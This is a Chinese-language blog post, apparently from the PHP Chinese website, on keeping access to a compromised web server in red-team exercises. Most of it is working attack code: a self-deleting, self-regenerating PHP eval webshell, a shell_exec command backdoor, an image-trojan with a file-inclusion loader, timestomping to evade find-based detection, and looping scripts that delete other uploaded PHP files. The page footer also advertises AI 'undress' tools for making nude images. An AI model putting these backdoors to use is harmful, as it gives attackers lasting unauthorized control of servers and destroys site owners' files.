前言
权限维持,在红蓝对抗中,我觉得其意义在于两点:一是防止已获取的权限被蓝队破坏;二是防止其他红队获取到相同的权限(虽然有点缺德。。。)。
其他情况下的非法用途就不说了。
权限维持的原则我觉得就是不能影响原来业务的正常运行。(比如改后台密码导致管理员不能登录,修改文件夹读写权限导致正常的文件不能上传等等)。
后台权限维持
当我们通过弱口令或爆破获取到后台权限,为了防止管理员修改密码或其他红队修改密码,失去权限,在这种情况下需要维持一下后台权限。
自己修改后台密码,当然是最笨的办法。
可以选择的方法,通过在后台源代码中插入xss代码,当然这种情况是已经获取到webshell权限了,当管理员访问后台时,我们就能获取到cookie,具体可参考:
参考
这个感觉有点鸡肋,因为已经有webshell的权限了,为什么还要维持后台权限呢,但是这个的好处就是因为在源代码中插入js代码,不容易被发现,这是优点。
webshell权限维持
常见的权限就是webshell的权限了,当获取到webshell权限后,有可能别蓝队发现,删除掉shell,也有可能其他红队也获取到这个权限。考虑到这两种情况,就需要维持了。
针对蓝队
其他文件夹写入shell:初次上传路径一般都是存放图片等类型文件的文件夹,如果在这样的文件夹中突然出现一个php后缀的文件,那么十有八九会被发现,所以为了避免被蓝队发现,一般做法是在其他可写的文件夹下写入shell。
改写shell的日期:这个主要针对linux平台,因为linux下webshell查杀工具不多,可能会通过命令去查杀。
可能的命令是find命令,比如:
find -name "*.php" -type f -mtime -3 -exec ls -l {} \;
修改方法是touch命令,比如:
touch -d '08-August-2019' rrr.php
效果如下:
写入不死马:所谓不死马,就是常驻内存的木马,通过循环在某路径下生成shell来维持权限,即使删除了shell,还是会生成。网上的不死马,我试了一下没成功,自己改了一下,最简单的,不免杀,经供参考:
<?php ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '3.php';
$code = '<?php @eval($_POST[\'pass\']);?>';
while (1) {
file_put_contents($file, $code);
system('touch -m -d "2018-12-01 09:10:12" 3.php');
usleep(5000);
}
?>
写入其他后门:
1.写入命令执行后门,比如:
<?php $cmd=$_GET["name"]; echo shell_exec($cmd); ?>
2.图片马结合文件包含脚本:图片马中写入恶意代码,然后在相应位置放置文件包含的漏洞文件,通过访问文件包含漏洞文件去解析图片马,图片马生成shell,然后直接连接。
比如,图片中插入如下代码,用于生成shell:
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST['cmd']);?>")?>
文件包含代码:
<?php $filename=$_GET['f']; //将参数file的值传递给$filename变量 include($filename); //使用include()函数包含文件 ?>
针对红队
获取webshell常见的情形是通过某一个上传点上传马获取,上传的文件夹路径一般是固定的,不可能一个文件对应一个文件夹。
如果想要阻止其他红队获取到webshell,我的思路是在上传文件夹下写一个批处理或bash,循环判断当前文件夹下的文件类型,发现指定后缀的文件就删除,代码大致如下:
Windows:
@echo off
cls
if "%1"=="h" goto start
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:start
for %%i in (*.php) do (del %%i)
choice /t 5 /d y /n >nul
goto start
Linux:
#! /bin/bash while true;do find . -type f -name "*.php"|xargs rm -rf done
The above is the detailed content of How to perform Web permission maintenance analysis. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
